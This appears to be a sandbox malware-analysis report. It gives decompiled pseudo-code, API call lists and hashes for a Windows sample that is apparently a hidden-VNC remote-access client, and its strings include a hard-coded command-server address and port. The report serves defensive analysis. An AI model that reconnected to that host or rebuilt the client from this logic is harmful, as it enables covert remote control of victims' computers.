                                          • Opcode ID: 0d8e672f142fd0e104f346c5dc3aefc0600affbc163e7b485cfa2471e5f08ed8
                                          • Instruction ID: 8d15e386904c987e89ddaad03a200c165ed05da41a17bf979752001ad1cbc47c
                                          • Opcode Fuzzy Hash: 0d8e672f142fd0e104f346c5dc3aefc0600affbc163e7b485cfa2471e5f08ed8
                                          • Instruction Fuzzy Hash: 1FD01275B427016A6F146B75FD49BC627DCB700715720043AF004E6193EE20D4005754
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          C-Code - Quality: 24%
                                          			E00C788A0(DWORD* __rax, long long __rbx, DWORD** __rdx) {
                                          				void* __rdi;
                                          				void* __rsi;
                                          				void* __rbp;
                                          				int _t51;
                                          				long _t52;
                                          				long _t94;
                                          				signed long long _t97;
                                          				DWORD* _t127;
                                          				DWORD** _t129;
                                          				DWORD* _t165;
                                          				signed long long _t167;
                                          				DWORD* _t169;
                                          				void* _t171;
                                          				void* _t172;
                                          				void* _t174;
                                          				DWORD* _t183;
                                          				long _t184;
                                          				void* _t186;
                                          				DWORD* _t188;
                                          				int _t189;
                                          				void* _t191;
                                          
                                          				_t127 = __rax;
                                          				 *((long long*)(_t171 + 8)) = __rbx;
                                          				 *((intOrPtr*)(_t171 + 0x20)) = r9d;
                                          				 *((intOrPtr*)(_t171 + 0x18)) = r8d;
                                          				_push(_t169);
                                          				_push(_t167);
                                          				_t172 = _t171 - 0x140;
                                          				_t129 = __rdx;
                                          				_t174 = _t172 + 0x40;
                                          				 *(_t172 + 0x20) =  *(_t172 + 0x20) & _t165;
                                          				r9d = 0x100;
                                          				r15d = 0;
                                          				r14d = 0;
                                          				r12d = 0;
                                          				_t7 =  &(_t169[0]); // 0x2
                                          				_t94 = _t7;
                                          				_t51 = GetUserObjectInformationA(_t191, _t189, _t186, _t184, _t165);
                                          				_t99 = _t51;
                                          				if(_t51 == 0) {
                                          					L17:
                                          					_t52 = GetLastError();
                                          					_t94 = _t52;
                                          					if(_t52 == 0) {
                                          						L20:
                                          						if(_t184 != 0) {
                                          							HeapFree();
                                          						}
                                          						if(_t169 != 0) {
                                          							HeapFree();
                                          						}
                                          						if(_t189 != 0) {
                                          							HeapFree();
                                          						}
                                          						if(_t191 != 0) {
                                          							HeapFree();
                                          						}
                                          						return _t94;
                                          					}
                                          					L18:
                                          					E00C78C54(_t129);
                                          					if(_t165 != 0) {
                                          						HeapFree();
                                          					}
                                          					goto L20;
                                          				}
                                          				_t9 = _t191 + 1; // 0x1
                                          				r13d = _t9;
                                          				r9d = r13d;
                                          				 *((intOrPtr*)(_t172 + 0x30)) =  *((intOrPtr*)(_t172 + 0x44));
                                          				r8d = 0;
                                          				E00C77E6C(_t99, __rdx, _t172 + 0x30, "Local\\", _t165, _t167, _t169, _t174);
                                          				_t191 = _t127;
                                          				_t100 = _t127;
                                          				if(_t127 == 0) {
                                          					goto L17;
                                          				}
                                          				r9d = r13d;
                                          				r8d = 0;
                                          				E00C77E6C(_t100, _t129, _t172 + 0x30, "Local\\", _t165, _t167, _t169, _t174);
                                          				_t169 = _t127;
                                          				_t101 = _t127;
                                          				if(_t127 == 0) {
                                          					goto L17;
                                          				}
                                          				r9d = r13d;
                                          				r8d = 0;
                                          				E00C77E6C(_t101, _t129, _t172 + 0x30, "Local\\", _t165, _t167, _t169, _t174);
                                          				_t189 = _t127;
                                          				_t102 = _t127;
                                          				if(_t127 == 0) {
                                          					goto L17;
                                          				}
                                          				r9d = r13d;
                                          				r8d = 0;
                                          				E00C77E6C(_t102, _t129, _t172 + 0x30, "Local\\", _t165, _t167, _t169, _t174);
                                          				_t188 = _t127;
                                          				_t103 = _t127;
                                          				if(_t127 == 0) {
                                          					goto L17;
                                          				}
                                          				_t15 = _t184 + 1; // 0x1
                                          				r9d = _t15;
                                          				r8d = 0;
                                          				E00C77E6C(_t103, _t129, _t172 + 0x30, "Local\\", _t165, _t167, _t169, _t174);
                                          				_t184 = _t127;
                                          				_t104 = _t127;
                                          				if(_t127 == 0) {
                                          					goto L17;
                                          				}
                                          				_t17 =  &(_t165[0]); // 0x1
                                          				r9d = _t17;
                                          				r8d = 0;
                                          				E00C77E6C(_t104, _t129, _t172 + 0x30, "Local\\", _t165, _t167, _t169, _t174);
                                          				_t165 = _t127;
                                          				if(_t127 == 0) {
                                          					goto L17;
                                          				}
                                          				r8d = 0;
                                          				CreateEventA(??, ??, ??, ??);
                                          				_t129[2] = _t127;
                                          				if(_t127 == 0) {
                                          					goto L17;
                                          				}
                                          				_t183 = _t188;
                                          				r8d = 0;
                                          				CreateEventA(??, ??, ??, ??);
                                          				_t129[4] = _t127;
                                          				if(_t127 == 0) {
                                          					goto L17;
                                          				}
                                          				CreateMutexA(); // executed
                                          				 *_t129 = _t127;
                                          				if(_t127 == 0) {
                                          					goto L17;
                                          				}
                                          				r13d =  *((intOrPtr*)(_t172 + 0x198));
                                          				if(r13d != 0 || GetLastError() == 0xb7) {
                                          					r9d = 0;
                                          					 *(_t172 + 0x28) = _t191;
                                          					 *(_t172 + 0x20) = 0x298;
                                          					_t26 =  &(_t183[1]); // 0x4
                                          					r8d = _t26;
                                          					CreateFileMappingA(??, ??, ??, ??, ??, ??);
                                          					_t129[6] = _t127;
                                          					if(_t127 == 0) {
                                          						goto L17;
                                          					}
                                          					r9d = 0;
                                          					 *(_t172 + 0x20) = _t167;
                                          					r8d = 0;
                                          					MapViewOfFile(??, ??, ??, ??, ??);
                                          					_t129[8] = _t127;
                                          					if(_t127 == 0) {
                                          						goto L17;
                                          					}
                                          					if(r13d == 0) {
                                          						OpenFileMappingA();
                                          						_t129[0xe] = _t127;
                                          						__eflags = _t127;
                                          						if(_t127 == 0) {
                                          							goto L17;
                                          						}
                                          						 *(_t172 + 0x20) =  *(_t172 + 0x20) & 0x00000000;
                                          						r9d = 0;
                                          						r8d = 0;
                                          						MapViewOfFile(??, ??, ??, ??, ??);
                                          						_t129[0x10] = _t127;
                                          						__eflags = _t127;
                                          						if(_t127 == 0) {
                                          							goto L17;
                                          						}
                                          						_t97 =  *(_t172 + 0x190);
                                          						L32:
                                          						_t129[0x12] = _t97;
                                          						_t94 = 0;
                                          						_t129[0xc] = _t165;
                                          						goto L20;
                                          					}
                                          					_t31 =  &(_t127[0x5c]); // 0x170
                                          					E00C77DBC(_t172 + 0x30, _t31);
                                          					lstrcpyA(??, ??);
                                          					_t97 =  *(_t172 + 0x190);
                                          					r9d = 0;
                                          					 *(_t172 + 0x28) = _t165;
                                          					 *(_t172 + 0x20) = _t97;
                                          					_t38 =  &(_t183[1]); // 0x4
                                          					r8d = _t38;
                                          					CreateFileMappingA(??, ??, ??, ??, ??, ??);
                                          					_t129[0xe] = _t127;
                                          					if(_t127 == 0) {
                                          						goto L17;
                                          					}
                                          					r9d = 0;
                                          					 *(_t172 + 0x20) = _t167;
                                          					r8d = 0;
                                          					MapViewOfFile(??, ??, ??, ??, ??);
                                          					_t129[0x10] = _t127;
                                          					if(_t127 != 0) {
                                          						goto L32;
                                          					}
                                          					goto L17;
                                          				} else {
                                          					goto L18;
                                          				}
                                          			}

                                          APIs
                                          • GetUserObjectInformationA.USER32 ref: 00C788E6
                                          • CreateEventA.KERNEL32 ref: 00C789E5
                                          • CreateEventA.KERNEL32 ref: 00C78A08
                                          • CreateMutexExA.KERNEL32 ref: 00C78A27
                                          • GetLastError.KERNEL32 ref: 00C78A46
                                          • CreateFileMappingA.KERNEL32 ref: 00C78A77
                                          • MapViewOfFile.KERNEL32 ref: 00C78A9E
                                          • lstrcpyA.KERNEL32 ref: 00C78ADB
                                          • CreateFileMappingA.KERNEL32 ref: 00C78B03
                                          • MapViewOfFile.KERNEL32 ref: 00C78B24
                                          • GetLastError.KERNEL32 ref: 00C78B37
                                          • HeapFree.KERNEL32 ref: 00C78B5C
                                          • HeapFree.KERNEL32 ref: 00C78B73
                                          • HeapFree.KERNEL32 ref: 00C78B8A
                                          • HeapFree.KERNEL32 ref: 00C78BA1
                                          • HeapFree.KERNEL32 ref: 00C78BB8
                                            • Part of subcall function 00C77E6C: lstrlenA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EBD
                                            • Part of subcall function 00C77E6C: lstrlenA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77ECD
                                            • Part of subcall function 00C77E6C: HeapAlloc.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EE1
                                            • Part of subcall function 00C77E6C: lstrcpyA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EFD
                                            • Part of subcall function 00C77E6C: lstrcatA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F09
                                            • Part of subcall function 00C77E6C: lstrcatA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F1A
                                            • Part of subcall function 00C77E6C: HeapFree.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F2C
                                          • OpenFileMappingA.KERNEL32 ref: 00C78BE2
                                          • MapViewOfFile.KERNEL32 ref: 00C78C06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$FileFree$Create$MappingView$ErrorEventLastlstrcatlstrcpylstrlen$AllocInformationMutexObjectOpenUser
                                          • String ID: Local\
                                          • API String ID: 1659859712-422136742
                                          • Opcode ID: 9c8354012493da1887db23aa19ff77b1d37d01d5690f2e67cd0a2aada56197b5
                                          • Instruction ID: b571c27b1748a0a14084f1bdbb4d0d8e18d66e2791372ad877ece822e2c2a674
                                          • Opcode Fuzzy Hash: 9c8354012493da1887db23aa19ff77b1d37d01d5690f2e67cd0a2aada56197b5
                                          • Instruction Fuzzy Hash: F5919E76211B9182FB21DF21E854F5A33A0FB88B98F8496259F5D07F54EF38CA49CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00C6AF40: lstrlenA.KERNEL32(?,?,?,00C6B0A4), ref: 00C6AF5C
                                            • Part of subcall function 00C6AF40: HeapAlloc.KERNEL32(?,?,?,00C6B0A4), ref: 00C6AF79
                                            • Part of subcall function 00C6AF40: memset.NTDLL(?,?,?,00C6B0A4), ref: 00C6AF8F
                                            • Part of subcall function 00C6AF40: memcpy.NTDLL(?,?,?,00C6B0A4), ref: 00C6AFAC
                                          • socket.WS2_32 ref: 00C6B0BF
                                          • connect.WS2_32 ref: 00C6B0DE
                                          • setsockopt.WS2_32 ref: 00C6B10B
                                            • Part of subcall function 00C6C840: setsockopt.WS2_32 ref: 00C6C864
                                            • Part of subcall function 00C6C840: setsockopt.WS2_32 ref: 00C6C885
                                          • send.WS2_32 ref: 00C6B12E
                                          • recv.WS2_32 ref: 00C6B147
                                          • shutdown.WS2_32 ref: 00C6B19B
                                          • closesocket.WS2_32 ref: 00C6B1A4
                                          • HeapFree.KERNEL32 ref: 00C6B1BA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: setsockopt$Heap$AllocFreeclosesocketconnectlstrlenmemcpymemsetrecvsendshutdownsocket
                                          • String ID:
                                          • API String ID: 1992057409-0
                                          • Opcode ID: ad95164e015f8c862a0bb2ff8f59ef57e7156f7253df4f202161e903d2998c8d
                                          • Instruction ID: dfba67421a1a065a6ea7c6b7a4e9e00b8cc6bd9d7f2ce456b6e8e065de1ce5ac
                                          • Opcode Fuzzy Hash: ad95164e015f8c862a0bb2ff8f59ef57e7156f7253df4f202161e903d2998c8d
                                          • Instruction Fuzzy Hash: C1419F322117808AEB209F16E85072E7761FB85FA0F548325DA6A87B94DF3CD985CB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, Offset: 00C9A000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 7fe431076db23cde40edc4675af80308f1a6a74ece7063cc91be67dba04bc9d2
                                          • Instruction ID: 2f7ea8ce1785c3186aba941557cbc6ebb7c88be10281800a9d6ef333b415792a
                                          • Opcode Fuzzy Hash: 7fe431076db23cde40edc4675af80308f1a6a74ece7063cc91be67dba04bc9d2
                                          • Instruction Fuzzy Hash: C681D53121CB898FDB29DF28D8967A577E0FF56314F0405AEC88BC7252E634D5468783
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 29%
                                          			_entry_(void* __edx, void* __esi, void* __ebp, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __rdi, void* __rbp, void* __r8, void* __r9, void* __r10, void* __r14, long long _a8, char _a16) {
                                          				void* _v424;
                                          				char _v696;
                                          				char _v712;
                                          				long long _v728;
                                          				void* __rsi;
                                          				signed int _t12;
                                          				intOrPtr _t14;
                                          				intOrPtr _t24;
                                          				void* _t25;
                                          				void* _t35;
                                          				void* _t40;
                                          				void* _t42;
                                          				intOrPtr _t50;
                                          				intOrPtr _t56;
                                          				intOrPtr _t58;
                                          				intOrPtr _t59;
                                          				void* _t69;
                                          
                                          				_t74 = __r8;
                                          				_t70 = __rbp;
                                          				_t68 = __rdi;
                                          				_t53 = __rbx;
                                          				_t51 = __rax;
                                          				_t45 = __ebp;
                                          				_a8 = __rbx;
                                          				if(__edx == 0) {
                                          					asm("lock xadd [0x3353e], eax");
                                          					__eflags = (_t12 | 0xffffffff) - 1;
                                          					if((_t12 | 0xffffffff) == 1) {
                                          						__eflags =  *0xc9564c; // 0x1
                                          						if(__eflags != 0) {
                                          							_t59 =  *0xc95650; // 0x20dcd802190
                                          							__eflags = _t59;
                                          							if(_t59 != 0) {
                                          								E00C68D58(_t59);
                                          							}
                                          						}
                                          						__eflags =  *0xc95660; // 0x1
                                          						if(__eflags != 0) {
                                          							_t56 =  *0xc956a0; // 0x1b8
                                          							__eflags = _t56;
                                          							if(_t56 != 0) {
                                          								SetEvent();
                                          								E00C62820(_t56, _t68);
                                          								E00C6872C(_t35, _t45, _t69, _t74);
                                          								E00C63F5C(0xc956c8);
                                          								E00C62604();
                                          								_t58 =  *0xc95658; // 0x20dcbdd0000
                                          								__eflags = _t58;
                                          								if(_t58 != 0) {
                                          									HeapDestroy();
                                          								}
                                          							}
                                          						}
                                          					}
                                          					L22:
                                          					_t14 =  *0xc95660; // 0x1
                                          					return _t14;
                                          				}
                                          				_t40 = __edx - 1;
                                          				if(_t40 == 0) {
                                          					asm("lock xadd [0x33625], eax");
                                          					__eflags = 2 - 1;
                                          					if(2 != 1) {
                                          						goto L22;
                                          					}
                                          					 *0xc95688 = __rcx;
                                          					_t24 = E00C61E98(__esi, __ebp, __rax, __rbx, __rcx, __r8, _t69, __rbp, __r8, __r9, __r10, __r14);
                                          					__eflags = _t24;
                                          					if(_t24 != 0) {
                                          						__eflags = _t24 - 2;
                                          						if(_t24 != 2) {
                                          							 *0xc95660 = 0;
                                          						} else {
                                          							__imp__#115(); // executed
                                          							_v712 = 2;
                                          							_v728 =  &_a16;
                                          							r8d = 0;
                                          							_a16 = 0x10;
                                          							__imp__WSAStringToAddressW(); // executed
                                          							_t25 = E00C62188();
                                          							r8d = E00C621B4( &_a16);
                                          							r9d = _t25;
                                          							wsprintfA(??, ??);
                                          							E00C68BCC(_t53, 0xc95650,  &_v712, __rdi, _t69, __rbp,  &_v696,  &_v712);
                                          							 *0xc95660 = 1;
                                          							 *0xc9564c = 1;
                                          							__imp__#116();
                                          						}
                                          					} else {
                                          						 *0xc95660 = 1;
                                          						L7:
                                          						E00C6A200(GetCurrentThreadId(), _t51, _t53, _t69, _t70);
                                          					}
                                          					goto L22;
                                          				}
                                          				_t42 = _t40 - 1;
                                          				if(_t42 == 0) {
                                          					__eflags =  *0xc9564c; // 0x1
                                          					if(__eflags != 0) {
                                          						goto L22;
                                          					}
                                          					goto L7;
                                          				} else {
                                          					if(_t42 == 1) {
                                          						_t50 =  *0xc9564c; // 0x1
                                          						if(_t50 == 0) {
                                          							E00C6A334(GetCurrentThreadId(), __rbx, _t69);
                                          						}
                                          					}
                                          					goto L22;
                                          				}
                                          			}

                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00C61FE6
                                            • Part of subcall function 00C6A334: EnterCriticalSection.KERNEL32(?,?,?,00C61FF3), ref: 00C6A350
                                            • Part of subcall function 00C6A334: LeaveCriticalSection.KERNEL32(?,?,?,00C61FF3), ref: 00C6A38F
                                            • Part of subcall function 00C6A334: UnhookWindowsHookEx.USER32 ref: 00C6A3A3
                                            • Part of subcall function 00C6A334: HeapFree.KERNEL32(?,?,?,00C61FF3), ref: 00C6A3B5
                                          • GetCurrentThreadId.KERNEL32 ref: 00C62004
                                          • WSAStartup.WS2_32 ref: 00C62067
                                          • WSAStringToAddressW.WS2_32 ref: 00C6209B
                                          • wsprintfA.USER32 ref: 00C620BF
                                          • WSACleanup.WS2_32 ref: 00C620EF
                                          • SetEvent.KERNEL32 ref: 00C6213C
                                          • HeapDestroy.KERNEL32 ref: 00C62169
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalCurrentHeapSectionThread$AddressCleanupDestroyEnterEventFreeHookLeaveStartupStringUnhookWindowswsprintf
                                          • String ID: 5.8.88.191:8080$H21HVNC-CLIENT-%08X%08X
                                          • API String ID: 940211779-3601121346
                                          • Opcode ID: 4445535575f36f4d353b80ea04d066e39caac2832ed3f690e63d520ad962ed29
                                          • Instruction ID: f13b640dfef93e89f1f478cb1c1451515bfc182dce3d8f192a3f4859d6b637e5
                                          • Opcode Fuzzy Hash: 4445535575f36f4d353b80ea04d066e39caac2832ed3f690e63d520ad962ed29
                                          • Instruction Fuzzy Hash: 60418031609E41C6FB31AF60E8D8F6D3320FB82751F844226EA2642B69DF3DC948DB01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • UnmapViewOfFile.KERNEL32(?,?,?,00C78B4B), ref: 00C78C66
                                          • CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78C7A
                                          • UnmapViewOfFile.KERNEL32(?,?,?,00C78B4B), ref: 00C78C8E
                                          • CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CA2
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,00C78B4B), ref: 00C78CB6
                                          • CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CC9
                                          • CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CDC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Close$Handle$FileUnmapView$ChangeFindNotification
                                          • String ID:
                                          • API String ID: 326854797-0
                                          • Opcode ID: 18708f6b5fa98c8f5083f05552644dd29c4abc091f2fbbf85d348f0453886eb6
                                          • Instruction ID: be35cc68409e50587fbaf8ff719464c1d2f1df86d739c7e7f9ed89fb5365707c
                                          • Opcode Fuzzy Hash: 18708f6b5fa98c8f5083f05552644dd29c4abc091f2fbbf85d348f0453886eb6
                                          • Instruction Fuzzy Hash: BC11ED26253B0486FF2ADFA1D4697392360FF88F49F588705CB1A4A518CF79C59CC3A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E00C61E98(void* __esi, void* __ebp, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r8, void* __r9, void* __r10, void* __r14, long long _a8, long long _a16) {
                                          				void* __rdi;
                                          				signed int _t10;
                                          				signed int _t11;
                                          				signed int _t12;
                                          				signed int _t13;
                                          				signed int _t17;
                                          				void* _t23;
                                          				void* _t24;
                                          				void* _t47;
                                          				void* _t48;
                                          				void* _t50;
                                          				void* _t56;
                                          				void* _t58;
                                          				void* _t59;
                                          
                                          				_t59 = __r14;
                                          				_t58 = __r10;
                                          				_t57 = __r9;
                                          				_t56 = __r8;
                                          				_t52 = __rbp;
                                          				_t38 = __rbx;
                                          				_t25 = __ebp;
                                          				_t24 = __esi;
                                          				_a8 = __rbx;
                                          				_a16 = __rsi;
                                          				_t48 = __rdx;
                                          				_t50 = __rcx;
                                          				r8d = 0; // executed
                                          				HeapCreate(??, ??, ??); // executed
                                          				 *0xc95658 = __rax;
                                          				if(__rax == 0) {
                                          					L11:
                                          					_t17 = GetLastError();
                                          					L12:
                                          					return _t17;
                                          				}
                                          				_t10 = E00C6250C(0x1b, __ebp, __rax, __rbx, __rcx, __rcx, __rbp, __r9);
                                          				_t17 = _t10;
                                          				if(_t10 == 0) {
                                          					_t11 = E00C629B8(__rax, _t38, _t50);
                                          					_t17 = _t11;
                                          					if(_t11 == 0) {
                                          						E00C63F74(); // executed
                                          						 *0xc955e0 = E00C63710;
                                          						 *0xc955e8 = E00C63748;
                                          						 *0xc955f0 = E00C63780;
                                          						 *0xc955f8 = E00C63A18;
                                          						_t12 = E00C687CC(_t24, _t25, E00C63A18, _t38, _t50, _t48, _t50, _t56, _t58, _t59);
                                          						_t17 = _t12;
                                          						if(_t12 == 0) {
                                          							_t13 = E00C617CC(1, _t23, _t25, E00C63A18, _t38, _t48, _t50, _t52, _t57);
                                          							_t17 = _t13;
                                          							if((_t13 & 0xfffffffd) == 0) {
                                          								_t17 = E00C684EC(0, _t24, _t25, E00C63A18, _t38, _t47, _t52, _t57);
                                          								E00C6A3D4();
                                          							}
                                          						} else {
                                          							if(_t12 == 2) {
                                          								E00C617CC(0, _t23, _t25, E00C63A18, _t38, _t48, _t50, _t52, _t57);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				if(_t17 != 0xffffffff) {
                                          					goto L12;
                                          				}
                                          				goto L11;
                                          			}

                                          APIs
                                          • HeapCreate.KERNELBASE(?,?,?,00C6203D), ref: 00C61EB7
                                          • GetLastError.KERNEL32(?,?,?,00C6203D), ref: 00C61F94
                                            • Part of subcall function 00C6250C: GetModuleHandleA.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C62523
                                            • Part of subcall function 00C6250C: GetVersion.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C62536
                                            • Part of subcall function 00C6250C: GetCurrentProcessId.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C62548
                                            • Part of subcall function 00C6250C: StrRChrA.SHLWAPI(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C625A2
                                            • Part of subcall function 00C6250C: CreateEventA.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C625D2
                                            • Part of subcall function 00C6250C: GetLastError.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C625E4
                                            • Part of subcall function 00C629B8: InitializeCriticalSection.KERNEL32(?,?,?,00C61EE9,?,?,?,00C6203D), ref: 00C629E8
                                            • Part of subcall function 00C629B8: InitializeCriticalSection.KERNEL32(?,?,?,00C61EE9,?,?,?,00C6203D), ref: 00C62A0A
                                            • Part of subcall function 00C629B8: GetModuleHandleA.KERNEL32(?,?,?,00C61EE9,?,?,?,00C6203D), ref: 00C62A35
                                            • Part of subcall function 00C684EC: GetCurrentProcess.KERNEL32(?,?,?,00C61F88,?,?,?,00C6203D), ref: 00C68614
                                            • Part of subcall function 00C6A3D4: InitializeCriticalSection.KERNEL32(?,?,?,?,00C61F8F,?,?,?,00C6203D), ref: 00C6A3F4
                                          Strings
                                          • S:(ML;;NW;;;LW), xrefs: 00C61F01
                                          • D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00C61F0A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalInitializeSection$CreateCurrentErrorHandleLastModuleProcess$EventHeapVersion
                                          • String ID: D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$S:(ML;;NW;;;LW)
                                          • API String ID: 3923076295-981555273
                                          • Opcode ID: 190fbfa328c60ce37192520c7de7bb3674701d52fd0dab3a44fb5d5f97ae2d83
                                          • Instruction ID: 0a9a7cc8202e7faac9e1ee2f387ad1476aec0024630b9cbf26b3f6a1d0070df2
                                          • Opcode Fuzzy Hash: 190fbfa328c60ce37192520c7de7bb3674701d52fd0dab3a44fb5d5f97ae2d83
                                          • Instruction Fuzzy Hash: E421C224300F4246FB71E7A5B8D472933A5AB48791F9C4321ED2983766EF38C5458306
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 19%
                                          			E00C6C7B8(void* __ecx, void* __edx, long long __rax, long long __rbx, long long* __rcx, void* __r8, void* __r9, long long _a8) {
                                          				signed long long _v16;
                                          				signed int _v24;
                                          				signed int _t14;
                                          				signed int _t19;
                                          				long long* _t35;
                                          				void* _t36;
                                          
                                          				_a8 = __rbx;
                                          				_t35 = __rcx;
                                          				_t14 = E00C7FA64(__ecx, __edx, __rax, _t36, __r8, __r9);
                                          				_t19 = _t14;
                                          				if(_t14 != 0) {
                                          					L4:
                                          					if(_t19 == 0xffffffff) {
                                          						_t19 = GetLastError();
                                          					}
                                          					L6:
                                          					return _t19;
                                          				}
                                          				 *((long long*)(_t35 + 8)) = _t35;
                                          				 *_t35 = _t35;
                                          				InitializeCriticalSection(??);
                                          				r9d = 0;
                                          				r8d = 0;
                                          				CreateEventA(??, ??, ??, ??);
                                          				 *((long long*)(_t35 + 0x60)) = __rax;
                                          				if(__rax == 0) {
                                          					goto L6;
                                          				}
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = _v24 & _t19;
                                          				CreateThread(??, ??, ??, ??, ??, ??); // executed
                                          				 *((long long*)(_t35 + 0x58)) = __rax;
                                          				if(__rax == 0) {
                                          					goto L6;
                                          				}
                                          				_t19 =  *(_t35 + 0x68);
                                          				goto L4;
                                          			}

                                          APIs
                                            • Part of subcall function 00C7FA64: InitializeCriticalSection.KERNEL32(?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C7FA71
                                            • Part of subcall function 00C7FA64: GetModuleHandleA.KERNEL32(?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C7FA7E
                                            • Part of subcall function 00C7FA64: GetProcAddress.KERNEL32(?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C7FA8E
                                          • InitializeCriticalSection.KERNEL32(?,?,?,?,00000008,00C68C59), ref: 00C6C7DB
                                          • CreateEventA.KERNEL32(?,?,?,?,00000008,00C68C59), ref: 00C6C7EC
                                          • CreateThread.KERNELBASE ref: 00C6C813
                                          • GetLastError.KERNEL32(?,?,?,?,00000008,00C68C59), ref: 00C6C82A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateCriticalInitializeSection$AddressErrorEventHandleLastModuleProcThread
                                          • String ID:
                                          • API String ID: 4241923591-0
                                          • Opcode ID: 7b2fa552339222a825177e9a5a635de3c053b6a4e2871eadb985d273e0797acb
                                          • Instruction ID: 8a33fbf64e42e0dcb73bc0870cff259b36b6c40e1859438e47c23dee0636b614
